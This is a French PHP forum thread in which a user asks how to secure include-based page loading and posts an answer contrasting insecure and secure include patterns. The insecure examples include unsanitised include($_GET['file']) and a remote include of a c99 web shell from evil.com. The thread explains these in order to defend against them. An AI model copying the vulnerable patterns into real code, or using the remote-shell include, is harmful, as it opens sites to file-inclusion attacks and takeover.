IdentifiantMot de passe
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Langage PHP Discussion :

sécuriser son menu et l'appel via include.


Sujet :

Langage PHP

  1. 05/03/2018, 23h07 #1
    slackuser
    slackuser est déconnecté
    Membre du Club
    Profil pro
    Inscrit en
    Mai 2008
    Messages
    40
    Détails du profil
    Informations personnelles :
    Localisation : France, Paris (Île de France)

    Informations forums :
    Inscription : Mai 2008
    Messages : 40
    Points : 41
    Points
    41
    Par défaut sécuriser son menu et l'appel via include.
    Bonsoir,
    une question qui je pense est vraiment très simple.
    Comment sécuriser l'appel au menu et l'include.
    J'ai vu un systeme de tableau avec le nom des pages du menu dedans mais c'est pas très clair.
    Si je pouvais avoir un exemple simple et efficace avec un explication rapide pour sécurisé tout ça, ce serait tip top !!
    En vous remerciant

    Mes fichiers :

    menu.php
    Code html : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    	<nav class="topnav">
		<ul>
			<li><a href="accueil.php">accueil</a></li>
			<li><a href="meteo.php">meteo</a></li>
			<li><a href="statistiques">statistiques</a></li>
		</ul>
	</nav>



    index.php
    Code html : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    <div class="meteo">
<?php @ require_once ("meteo.php"); ?>
</div>


    meteo.php
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    echo "test";
    Répondre avec citation Répondre avec citation   0  0
  2. 06/03/2018, 00h20 #2
    slackuser
    slackuser est déconnecté
    Membre du Club
    Profil pro
    Inscrit en
    Mai 2008
    Messages
    40
    Détails du profil
    Informations personnelles :
    Localisation : France, Paris (Île de France)

    Informations forums :
    Inscription : Mai 2008
    Messages : 40
    Points : 41
    Points
    41
    Par défaut réponse ici (merci google) :D
    It all depends on how you implement it. If you specifically set the path, then it's secure. The attack could happen if you allow user input to determine the file path without sanitization or checks.

    Insecure (Directory Traversal)

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    <?php 
include($_GET['file']);
?>
    Insecure (URL fopen - If enabled)

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    <?php 
include('http://evil.com/c99shell.php');
?>
    Insecure

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    <?php 
include('./some_dir/' . $_GET['file']);
?>
    Partially Insecure ( *.php files are vulnerable )

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    <?php 
include('./some_dir/' . $_GET['file'] . '.php');
?>
    Secure (Though not sure why anyone would do this.)

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    <?php 
$allowed = array(
    'somefile.php',
    'someotherfile.php'
);
if (in_array(basename($_GET['file']), $allowed)) {
    include('./includes/' . basename($_GET['file']));
}
?>
    Secure
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    <?php 
include('./includes/somefile.php');
?>

    une bonne soirée à tous
    Répondre avec citation Répondre avec citation   0  0
+ Répondre à la discussion
Cette discussion est résolue.
ActualitésFAQ PHPCours PHPSources PHPLivres PHPScripts PHPOutils PHPLaravelSymfonyZend Framework
« Discussion précédente | Discussion suivante »

Discussions similaires

  1. Appeler un include via un HREF
    Par beegees dans le forum Langage
    Réponses: 5
    Dernier message: 12/10/2008, 10h55
  2. Passer des paramètres à une application appelée via un menu contextuel
    Par mitmit dans le forum Windows
    Réponses: 4
    Dernier message: 05/11/2007, 09h19
  3. [MySQL] menu select dans une page include problème de paramètres
    Par starr dans le forum PHP & Base de données
    Réponses: 8
    Dernier message: 07/07/2006, 08h42
  4. Comment heberger son site web sur xp via IIS
    Par cortex024 dans le forum Windows XP
    Réponses: 3
    Dernier message: 16/02/2006, 09h22
  5. [C++] Appel via paramètres non managés
    Par JulienDuSud dans le forum Framework .NET
    Réponses: 4
    Dernier message: 28/12/2005, 10h42

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo